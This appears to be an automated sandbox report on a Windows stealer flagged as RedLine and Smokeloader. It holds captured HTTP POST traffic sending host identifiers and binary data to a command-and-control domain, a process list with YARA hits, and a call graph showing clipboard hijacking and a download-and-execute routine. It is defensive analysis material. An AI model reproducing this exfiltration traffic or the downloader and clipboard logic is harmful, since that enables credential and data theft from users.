                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XZqqU3SVl0O4TQ82BKi49zwIC6W9DEIKX2Q6JbF1xM3hh900bMW4OJCGmAloFVabBZEH2fPAjyTKw9mJvEIl2EYT%2BPpGOSjdS%2BWD%2BKV7AKRGiaf1xRt5qCRgDdFeab4ENEsxpZg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8ff2be820e8e8cda-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1904&min_rtt=1888&rtt_var=741&sent=9&recv=14&lost=0&retrans=0&sent_bytes=3057&recv_bytes=9657&delivery_rate=2168316&cwnd=243&unsent_bytes=0&cid=4a508fa9bdb5d4ba&ts=525&x=0"
                                                                                                      2025-01-09 07:34:19 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                      2025-01-09 07:34:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      5192.168.2.449736104.21.48.14437076C:\Users\user\AppData\Local\Temp\67E6.tmp.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-09 07:34:20 UTC275OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=0ZIMRBWG3
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 20378
                                                                                                      Host: skidjazzyric.click
                                                                                                      2025-01-09 07:34:20 UTC15331OUTData Raw: 2d 2d 30 5a 49 4d 52 42 57 47 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 38 35 31 31 33 37 41 31 35 39 41 43 32 42 44 30 36 33 32 44 46 30 45 32 38 44 43 34 31 32 0d 0a 2d 2d 30 5a 49 4d 52 42 57 47 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 30 5a 49 4d 52 42 57 47 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 30 5a 49 4d 52 42 57 47 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                                      Data Ascii: --0ZIMRBWG3Content-Disposition: form-data; name="hwid"80851137A159AC2BD0632DF0E28DC412--0ZIMRBWG3Content-Disposition: form-data; name="pid"3--0ZIMRBWG3Content-Disposition: form-data; name="lid"4h5VfH----0ZIMRBWG3Content-Dispositi
                                                                                                      2025-01-09 07:34:20 UTC5047OUTData Raw: 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c 78 29 f8 d7 c1 d7 cc 07 00 00
                                                                                                      Data Ascii: QMn 64F6(X&7~`aO@dR<x)
                                                                                                      2025-01-09 07:34:20 UTC1129INHTTP/1.1 200 OK
                                                                                                      Date: Thu, 09 Jan 2025 07:34:20 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=1kau76qgml73535lg67g9tgtqq; expires=Mon, 05 May 2025 01:20:59 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GqmdBw7Q4wEQ0p6o7HqWVKFaJjt4rLB32jGqUOiJ9CInftY2cZg66Rz4Bk0hCX5Et%2FD0UHgkODkHKvDaIFMJbn40q6o0CDJ59S5wNGa0pX%2BbOga7rsv5hRGFxkJFR9OxVmgqxG4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8ff2be89a89543be-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1551&min_rtt=1545&rtt_var=592&sent=12&recv=26&lost=0&retrans=0&sent_bytes=3058&recv_bytes=21333&delivery_rate=2740926&cwnd=227&unsent_bytes=0&cid=738ca4ce0f415568&ts=628&x=0"
                                                                                                      2025-01-09 07:34:20 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                      2025-01-09 07:34:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Click to jump to process

                                                                                                      Click to jump to process

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Click to jump to process

                                                                                                      Target ID:0
                                                                                                      Start time:02:34:07
                                                                                                      Start date:09/01/2025
                                                                                                      Path:C:\Users\user\Desktop\DLKs2Qeljg.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\DLKs2Qeljg.exe"
                                                                                                      Imagebase:0x400000
                                                                                                      File size:503'808 bytes
                                                                                                      MD5 hash:7B98863009146A47F1100922BE254455
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4149087882.0000000000589000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                      Reputation:low
                                                                                                      Has exited:false

                                                                                                      Target ID:1
                                                                                                      Start time:02:34:13
                                                                                                      Start date:09/01/2025
                                                                                                      Path:C:\Users\user\AppData\Local\Temp\67E6.tmp.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\67E6.tmp.exe"
                                                                                                      Imagebase:0x400000
                                                                                                      File size:341'504 bytes
                                                                                                      MD5 hash:D66791DB5C8D7BF392361E2343F7A5EA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000001.00000002.1945775576.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1945858989.0000000000774000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 100%, Avira
                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:4
                                                                                                      Start time:02:34:21
                                                                                                      Start date:09/01/2025
                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 1800
                                                                                                      Imagebase:0xdc0000
                                                                                                      File size:483'680 bytes
                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Reset < >

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:2.2%
                                                                                                        Dynamic/Decrypted Code Coverage:3.8%
                                                                                                        Signature Coverage:5.8%
                                                                                                        Total number of Nodes:737
                                                                                                        Total number of Limit Nodes:22
                                                                                                        execution_graph 63618 402ba3 RegCreateKeyExW 63619 402bd1 RegSetValueExW 63618->63619 63620 402be5 63618->63620 63619->63620 63621 402bf3 63620->63621 63622 402bea RegCloseKey 63620->63622 63622->63621 63623 404b84 63624 404b90 StructuredWorkStealingQueue 63623->63624 63629 40fb02 63624->63629 63628 404bb0 StructuredWorkStealingQueue Concurrency::details::SchedulerBase::Statistics 63632 40fb07 63629->63632 63631 404b99 63637 4051c6 63631->63637 63632->63631 63634 40fb23 Concurrency::details::GlobalCore::Initialize 63632->63634 63653 42ad6e 63632->63653 63660 42f440 7 API calls 2 library calls 63632->63660 63661 4285fd RaiseException 63634->63661 63636 4103bc 63638 4051d2 StructuredWorkStealingQueue __Cnd_init 63637->63638 63641 4051ea __Mtx_init 63638->63641 63672 40ce28 28 API calls std::_Throw_Cpp_error 63638->63672 63640 405211 63664 4010ea 63640->63664 63641->63640 63673 40ce28 28 API calls std::_Throw_Cpp_error 63641->63673 63647 405260 63649 405275 Concurrency::details::SchedulerBase::Statistics 63647->63649 63675 401128 28 API calls 2 library calls 63647->63675 63676 401109 63649->63676 63652 40529a StructuredWorkStealingQueue 63652->63628 63658 433697 pre_c_initialization 63653->63658 63654 4336d5 63663 42eab9 20 API calls __dosmaperr 63654->63663 63656 4336c0 RtlAllocateHeap 63657 4336d3 63656->63657 63656->63658 63657->63632 63658->63654 63658->63656 63662 42f440 7 API calls 2 library calls 63658->63662 63660->63632 63661->63636 63662->63658 63663->63657 63680 40d309 63664->63680 63667 401103 63669 40cee9 63667->63669 63712 42e104 63669->63712 63672->63641 63673->63640 63674 40ce28 28 API calls std::_Throw_Cpp_error 63674->63647 63675->63647 63677 401115 __Mtx_unlock 63676->63677 63679 401122 63677->63679 64044 40ce28 28 API calls std::_Throw_Cpp_error 63677->64044 63679->63652 63684 40d063 63680->63684 63683 40ce28 28 API calls std::_Throw_Cpp_error 63683->63667 63685 40d0b9 63684->63685 63686 40d08b GetCurrentThreadId 63684->63686 63688 40d0e3 63685->63688 63689 40d0bd GetCurrentThreadId 63685->63689 63687 40d096 GetCurrentThreadId 63686->63687 63698 40d0b1 63686->63698 63687->63698 63690 40d17c GetCurrentThreadId 63688->63690 63693 40d103 63688->63693 63692 40d0cc 63689->63692 63690->63692 63691 40d1d3 GetCurrentThreadId 63691->63698 63692->63691 63692->63698 63709 40e925 GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 63693->63709 63697 4010f6 63697->63667 63697->63683 63702 40f8c5 63698->63702 63699 40d13b GetCurrentThreadId 63699->63692 63700 40d10e __Xtime_diff_to_millis2 63699->63700 63700->63692 63700->63698 63700->63699 63710 40e925 GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 63700->63710 63703 40f8d0 IsProcessorFeaturePresent 63702->63703 63704 40f8ce 63702->63704 63706 40f943 63703->63706 63704->63697 63711 40f907 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 63706->63711 63708 40fa26 63708->63697 63709->63700 63710->63700 63711->63708 63713 42e111 63712->63713 63714 42e125 63712->63714 63735 42eab9 20 API calls __dosmaperr 63713->63735 63726 42e0bb 63714->63726 63717 42e116 63736 42a58d 26 API calls _Deallocate 63717->63736 63720 42e13a CreateThread 63721 42e165 63720->63721 63722 42e159 GetLastError 63720->63722 63764 42dfb0 63720->63764 63738 42e02d 63721->63738 63737 42ea83 20 API calls 2 library calls 63722->63737 63725 40524d 63725->63647 63725->63674 63746 434d1a 63726->63746 63730 42e0d4 63731 42e0f3 63730->63731 63732 42e0db GetModuleHandleExW 63730->63732 63733 42e02d __Thrd_start 22 API calls 63731->63733 63732->63731 63734 42e0fd 63733->63734 63734->63720 63734->63721 63735->63717 63736->63725 63737->63721 63739 42e03a 63738->63739 63740 42e05e 63738->63740 63741 42e040 CloseHandle 63739->63741 63742 42e049 63739->63742 63740->63725 63741->63742 63743 42e058 63742->63743 63744 42e04f FreeLibrary 63742->63744 63745 43345a _free 20 API calls 63743->63745 63744->63743 63745->63740 63747 434d27 63746->63747 63748 434d52 HeapAlloc 63747->63748 63749 434d67 63747->63749 63752 434d3b pre_c_initialization 63747->63752 63750 434d65 63748->63750 63748->63752 63762 42eab9 20 API calls __dosmaperr 63749->63762 63753 42e0cb 63750->63753 63752->63748 63752->63749 63761 42f440 7 API calls 2 library calls 63752->63761 63755 43345a 63753->63755 63756 433465 HeapFree 63755->63756 63760 43348e _free 63755->63760 63757 43347a 63756->63757 63756->63760 63763 42eab9 20 API calls __dosmaperr 63757->63763 63759 433480 GetLastError 63759->63760 63760->63730 63761->63752 63762->63753 63763->63759 63765 42dfbc _Atexit 63764->63765 63766 42dfc3 GetLastError ExitThread 63765->63766 63767 42dfd0 63765->63767 63780 431eca GetLastError 63767->63780 63769 42dfd5 63800 435561 63769->63800 63772 42dfeb 63807 401169 63772->63807 63781 431ee0 63780->63781 63782 431ee6 63780->63782 63815 435101 11 API calls 2 library calls 63781->63815 63784 434d1a pre_c_initialization 20 API calls 63782->63784 63785 431f35 SetLastError 63782->63785 63787 431ef8 63784->63787 63785->63769 63786 431f00 63789 43345a _free 20 API calls 63786->63789 63787->63786 63816 435157 11 API calls 2 library calls 63787->63816 63791 431f06 63789->63791 63790 431f15 63790->63786 63792 431f1c 63790->63792 63793 431f41 SetLastError 63791->63793 63817 431d3c 20 API calls pre_c_initialization 63792->63817 63818 42df6d 167 API calls 2 library calls 63793->63818 63795 431f27 63797 43345a _free 20 API calls 63795->63797 63799 431f2e 63797->63799 63798 431f4d 63799->63785 63799->63793 63801 435586 63800->63801 63802 43557c 63800->63802 63819 434e83 5 API calls 2 library calls 63801->63819 63804 40f8c5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 63802->63804 63805 42dfe0 63804->63805 63805->63772 63814 435494 10 API calls 2 library calls 63805->63814 63806 43559d 63806->63802 63820 4057f6 63807->63820 63833 40155a Sleep 63807->63833 63808 401173 63811 42e189 63808->63811 64012 42e064 63811->64012 63813 42e196 63814->63772 63815->63782 63816->63790 63817->63795 63818->63798 63819->63806 63821 405802 StructuredWorkStealingQueue 63820->63821 63822 4010ea std::_Cnd_initX 35 API calls 63821->63822 63824 405817 __Cnd_signal 63822->63824 63823 40582f 63825 401109 std::_Cnd_initX 28 API calls 63823->63825 63824->63823 63879 40ce28 28 API calls std::_Throw_Cpp_error 63824->63879 63827 405838 63825->63827 63835 4016df 63827->63835 63856 4029ea InternetOpenW 63827->63856 63830 40583f StructuredWorkStealingQueue Concurrency::details::SchedulerBase::Statistics 63830->63808 63834 4016d5 63833->63834 63880 40fddc 63835->63880 63837 4016eb Sleep 63881 40cc06 63837->63881 63840 40cc06 28 API calls 63841 401711 63840->63841 63842 40171b OpenClipboard 63841->63842 63843 401943 Sleep 63842->63843 63844 40172b GetClipboardData 63842->63844 63843->63842 63845 40173b GlobalLock 63844->63845 63846 40193d CloseClipboard 63844->63846 63845->63846 63851 401748 _strlen 63845->63851 63846->63843 63847 40cbbd 28 API calls std::system_error::system_error 63847->63851 63848 40cc06 28 API calls 63848->63851 63850 4018d2 EmptyClipboard GlobalAlloc 63850->63851 63852 4018eb GlobalLock 63850->63852 63851->63846 63851->63847 63851->63848 63851->63850 63885 402e5c 167 API calls 2 library calls 63851->63885 63887 40ca9c 26 API calls _Deallocate 63851->63887 63886 426980 63852->63886 63855 401905 GlobalUnlock SetClipboardData GlobalFree 63855->63851 63857 402a1d InternetOpenUrlW 63856->63857 63859 402b92 63856->63859 63858 402a33 GetTempPathW GetTempFileNameW 63857->63858 63857->63859 63893 42a87e 63858->63893 63861 40f8c5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 63859->63861 63863 402ba1 63861->63863 63872 40e761 63863->63872 63864 402b81 InternetCloseHandle InternetCloseHandle 63864->63859 63865 402a9e ListArray 63866 402ab6 InternetReadFile WriteFile 63865->63866 63867 402af6 CloseHandle 63865->63867 63866->63865 63895 402956 63867->63895 63869 402b0a 63869->63864 63869->63869 63870 402b21 ShellExecuteExW 63869->63870 63870->63864 63871 402b68 WaitForSingleObject CloseHandle 63870->63871 63871->63864 64003 40dee0 63872->64003 63877 40e806 63877->63830 63878 40e778 __Cnd_do_broadcast_at_thread_exit __Mtx_unlock __Cnd_broadcast 64010 40deec LeaveCriticalSection std::_Lockit::~_Lockit 63878->64010 63879->63823 63880->63837 63882 40cc22 _strlen 63881->63882 63888 40cbbd 63882->63888 63884 401704 63884->63840 63885->63851 63886->63855 63887->63851 63889 40cbf0 63888->63889 63890 40cbcc BuildCatchObjectHelperInternal 63888->63890 63889->63890 63892 40cb52 28 API calls 4 library calls 63889->63892 63890->63884 63892->63890 63894 402a6c CreateFileW 63893->63894 63894->63864 63894->63865 63896 402981 ListArray _wcslen 63895->63896 63905 42b444 63896->63905 63900 4029ae 63927 404329 63900->63927 63903 40f8c5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 63904 4029e8 63903->63904 63904->63869 63931 42b0f6 63905->63931 63908 402819 63909 402828 StructuredWorkStealingQueue 63908->63909 63957 4032d3 63909->63957 63911 40283c 63973 403b81 63911->63973 63913 402850 63914 402862 63913->63914 63915 40287e 63913->63915 64000 403290 167 API calls 63914->64000 63979 403108 63915->63979 63918 40288b 63982 403c16 63918->63982 63920 40289d 63992 403cb8 63920->63992 63922 4028ba 63923 404329 26 API calls 63922->63923 63925 4028d9 63923->63925 63924 402875 std::ios_base::_Ios_base_dtor StructuredWorkStealingQueue 63924->63900 64001 403290 167 API calls 63925->64001 63928 404331 63927->63928 63929 4029da 63927->63929 64002 40cc8c 26 API calls 2 library calls 63928->64002 63929->63903 63932 42b123 63931->63932 63933 42b132 63932->63933 63934 42b14a 63932->63934 63950 42b127 63932->63950 63935 42eab9 _free 20 API calls 63933->63935 63936 42a737 __fassign 162 API calls 63934->63936 63937 42b137 63935->63937 63939 42b155 63936->63939 63940 42a58d __wsopen_s 26 API calls 63937->63940 63938 40f8c5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 63941 40299a 63938->63941 63942 42b160 63939->63942 63943 42b2f7 63939->63943 63940->63950 63941->63908 63946 42b208 WideCharToMultiByte 63942->63946 63952 42b1a5 WideCharToMultiByte 63942->63952 63953 42b16b 63942->63953 63944 42b324 WideCharToMultiByte 63943->63944 63945 42b302 63943->63945 63944->63945 63948 42eab9 _free 20 API calls 63945->63948 63945->63950 63949 42b233 63946->63949 63946->63953 63948->63950 63951 42b23c GetLastError 63949->63951 63949->63953 63950->63938 63951->63953 63956 42b24b 63951->63956 63952->63953 63953->63950 63954 42eab9 _free 20 API calls 63953->63954 63954->63950 63955 42b264 WideCharToMultiByte 63955->63945 63955->63956 63956->63945 63956->63950 63956->63955 63958 4032df StructuredWorkStealingQueue 63957->63958 63959 404672 167 API calls 63958->63959 63960 40330b 63959->63960 63961 404843 167 API calls 63960->63961 63962 403334 63961->63962 63963 404582 26 API calls 63962->63963 63964 403343 63963->63964 63965 403388 std::ios_base::_Ios_base_dtor 63964->63965 63966 40ddd9 167 API calls 63964->63966 63967 4033c4 StructuredWorkStealingQueue 63965->63967 63969 40c60e 167 API calls 63965->63969 63968 403358 63966->63968 63967->63911 63968->63965 63970 404582 26 API calls 63968->63970 63969->63967 63971 403369 63970->63971 63972 404c0a 167 API calls 63971->63972 63972->63965 63974 403b8d StructuredWorkStealingQueue 63973->63974 63975 4042a5 167 API calls 63974->63975 63976 403b99 63975->63976 63977 403bbd StructuredWorkStealingQueue 63976->63977 63978 4034f1 167 API calls 63976->63978 63977->63913 63978->63977 63980 40434c 28 API calls 63979->63980 63981 403122 ListArray 63980->63981 63981->63918 63983 403c22 StructuredWorkStealingQueue 63982->63983 63984 40c60e 167 API calls 63983->63984 63985 403c45 63984->63985 63986 4042a5 167 API calls 63985->63986 63987 403c4f 63986->63987 63988 403c92 StructuredWorkStealingQueue 63987->63988 63991 4034f1 167 API calls 63987->63991 63988->63920 63989 403c70 63989->63988 63990 4046c0 167 API calls 63989->63990 63990->63988 63991->63989 63993 403cc4 __EH_prolog3_catch 63992->63993 63994 4042a5 167 API calls 63993->63994 63996 403cdd 63994->63996 63995 4046c0 167 API calls 63997 403d66 StructuredWorkStealingQueue 63995->63997 63998 403d0d 63996->63998 63999 403695 40 API calls 63996->63999 63997->63922 63998->63995 63999->63998 64000->63924 64001->63924 64002->63929 64011 40f220 EnterCriticalSection 64003->64011 64005 40deea 64006 40ce8f GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 64005->64006 64007 40cec8 64006->64007 64008 40cebd CloseHandle 64006->64008 64009 40cecc GetCurrentThreadId 64007->64009 64008->64009 64009->63878 64010->63877 64011->64005 64021 431f4e GetLastError 64012->64021 64014 42e073 ExitThread 64015 42e091 64018 42e09d CloseHandle 64015->64018 64019 42e0a4 64015->64019 64018->64019 64019->64014 64020 42e0b0 FreeLibraryAndExitThread 64019->64020 64022 431f6d 64021->64022 64023 431f67 64021->64023 64025 434d1a pre_c_initialization 17 API calls 64022->64025 64027 431fc4 SetLastError 64022->64027 64041 435101 11 API calls 2 library calls 64023->64041 64026 431f7f 64025->64026 64028 431f87 64026->64028 64042 435157 11 API calls 2 library calls 64026->64042 64029 42e06f 64027->64029 64032 43345a _free 17 API calls 64028->64032 64029->64014 64029->64015 64040 4354e6 10 API calls 2 library calls 64029->64040 64031 431f9c 64031->64028 64033 431fa3 64031->64033 64034 431f8d 64032->64034 64043 431d3c 20 API calls pre_c_initialization 64033->64043 64036 431fbb SetLastError 64034->64036 64036->64029 64037 431fae 64038 43345a _free 17 API calls 64037->64038 64039 431fb4 64038->64039 64039->64027 64039->64036 64040->64015 64041->64022 64042->64031 64043->64037 64044->63679 64045 402394 64046 402557 PostQuitMessage 64045->64046 64047 4023a8 64045->64047 64051 402555 64046->64051 64048 4023af DefWindowProcW 64047->64048 64049 4023c6 64047->64049 64048->64051 64050 4029ea 167 API calls 64049->64050 64049->64051 64050->64051 64052 432775 64057 432543 64052->64057 64055 43279d 64062 43256e 64057->64062 64059 432761 64076 42a58d 26 API calls _Deallocate 64059->64076 64061 4326c0 64061->64055 64069 43d00c 64061->64069 64062->64062 64065 4326b7 64062->64065 64072 43c8be 170 API calls 2 library calls 64062->64072 64064 432701 64064->64065 64073 43c8be 170 API calls 2 library calls 64064->64073 64065->64061 64075 42eab9 20 API calls __dosmaperr 64065->64075 64067 432720 64067->64065 64074 43c8be 170 API calls 2 library calls 64067->64074 64077 43c9e1 64069->64077 64071 43d027 64071->64055 64072->64064 64073->64067 64074->64065 64075->64059 64076->64061 64078 43c9ed CallCatchBlock 64077->64078 64079 43c9fb 64078->64079 64082 43ca34 64078->64082 64095 42eab9 20 API calls __dosmaperr 64079->64095 64081 43ca00 64096 42a58d 26 API calls _Deallocate 64081->64096 64088 43cfbb 64082->64088 64087 43ca0a __wsopen_s 64087->64071 64098 43f931 64088->64098 64093 43345a _free 20 API calls 64094 43ca58 64093->64094 64097 43ca81 LeaveCriticalSection __wsopen_s 64094->64097 64095->64081 64096->64087 64097->64087 64099 43f954 64098->64099 64100 43f93d 64098->64100 64102 43f973 64099->64102 64103 43f95c 64099->64103 64168 42eab9 20 API calls __dosmaperr 64100->64168 64172 434f9a 10 API calls 2 library calls 64102->64172 64170 42eab9 20 API calls __dosmaperr 64103->64170 64104 43f942 64169 42a58d 26 API calls _Deallocate 64104->64169 64108 43f961 64171 42a58d 26 API calls _Deallocate 64108->64171 64109 43f97a MultiByteToWideChar 64111 43f9a9 64109->64111 64112 43f999 GetLastError 64109->64112 64174 433697 21 API calls 3 library calls 64111->64174 64173 42ea83 20 API calls 2 library calls 64112->64173 64115 43f9b1 64117 43f9d9 64115->64117 64118 43f9b8 MultiByteToWideChar 64115->64118 64116 43cfd1 64116->64094 64122 43d02c 64116->64122 64120 43345a _free 20 API calls 64117->64120 64118->64117 64119 43f9cd GetLastError 64118->64119 64175 42ea83 20 API calls 2 library calls 64119->64175 64120->64116 64123 43d049 64122->64123 64124 43d077 64123->64124 64125 43d05e 64123->64125 64176 43976e 64124->64176 64190 42eaa6 20 API calls __dosmaperr 64125->64190 64128 43d063 64191 42eab9 20 API calls __dosmaperr 64128->64191 64129 43d07c 64130 43d085 64129->64130 64131 43d09c 64129->64131 64192 42eaa6 20 API calls __dosmaperr 64130->64192 64189 43ccfa CreateFileW 64131->64189 64135 43d08a 64193 42eab9 20 API calls __dosmaperr 64135->64193 64137 43d152 GetFileType 64138 43d1a4 64137->64138 64139 43d15d GetLastError 64137->64139 64198 4396b7 21 API calls 3 library calls 64138->64198 64196 42ea83 20 API calls 2 library calls 64139->64196 64140 43d127 GetLastError 64195 42ea83 20 API calls 2 library calls 64140->64195 64142 43d0d5 64142->64137 64142->64140 64194 43ccfa CreateFileW 64142->64194 64144 43d16b CloseHandle 64144->64128 64146 43d194 64144->64146 64197 42eab9 20 API calls __dosmaperr 64146->64197 64148 43d11a 64148->64137 64148->64140 64150 43d1c5 64152 43d211 64150->64152 64199 43cf0b 169 API calls 4 library calls 64150->64199 64151 43d199 64151->64128 64156 43d23e 64152->64156 64200 43caad 167 API calls 4 library calls 64152->64200 64155 43d237 64155->64156 64157 43d24f 64155->64157 64201 4335bd 29 API calls 2 library calls 64156->64201 64159 43cff9 64157->64159 64160 43d2cd CloseHandle 64157->64160 64159->64093 64202 43ccfa CreateFileW 64160->64202 64162 43d2f8 64163 43d302 GetLastError 64162->64163 64164 43d247 64162->64164 64203 42ea83 20 API calls 2 library calls 64163->64203 64164->64159 64166 43d30e 64204 439880 21 API calls 3 library calls 64166->64204 64168->64104 64169->64116 64170->64108 64171->64116 64172->64109 64173->64116 64174->64115 64175->64117 64177 43977a CallCatchBlock 64176->64177 64205 42e3dd EnterCriticalSection 64177->64205 64180 4397a6 64209 43954d 21 API calls 3 library calls 64180->64209 64181 439781 64181->64180 64185 439814 EnterCriticalSection 64181->64185 64188 4397c8 64181->64188 64182 4397f1 __wsopen_s 64182->64129 64184 4397ab 64184->64188 64210 439694 EnterCriticalSection 64184->64210 64186 439821 LeaveCriticalSection 64185->64186 64185->64188 64186->64181 64206 439877 64188->64206 64189->64142 64190->64128 64191->64159 64192->64135 64193->64128 64194->64148 64195->64128 64196->64144 64197->64151 64198->64150 64199->64152 64200->64155 64201->64164 64202->64162 64203->64166 64204->64164 64205->64181 64211 42e425 LeaveCriticalSection 64206->64211 64208 43987e 64208->64182 64209->64184 64210->64188 64211->64208 64212 4340fa 64213 434106 CallCatchBlock 64212->64213 64214 434112 64213->64214 64215 434129 64213->64215 64246 42eab9 20 API calls __dosmaperr 64214->64246 64225 42caef EnterCriticalSection 64215->64225 64218 434117 64247 42a58d 26 API calls _Deallocate 64218->64247 64219 434139 64226 434176 64219->64226 64222 434145 64248 43416c LeaveCriticalSection __fread_nolock 64222->64248 64223 434122 __wsopen_s 64225->64219 64227 434184 64226->64227 64228 43419e 64226->64228 64259 42eab9 20 API calls __dosmaperr 64227->64259 64249 4328f8 64228->64249 64231 434189 64260 42a58d 26 API calls _Deallocate 64231->64260 64232 4341a7 64256 4347c3 64232->64256 64236 4342ab 64238 4342b8 64236->64238 64242 43425e 64236->64242 64237 43422f 64240 43424c 64237->64240 64237->64242 64262 42eab9 20 API calls __dosmaperr 64238->64262 64261 43448f 31 API calls 4 library calls 64240->64261 64245 434194 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 64242->64245 64263 43430b 30 API calls 2 library calls 64242->64263 64243 434256 64243->64245 64245->64222 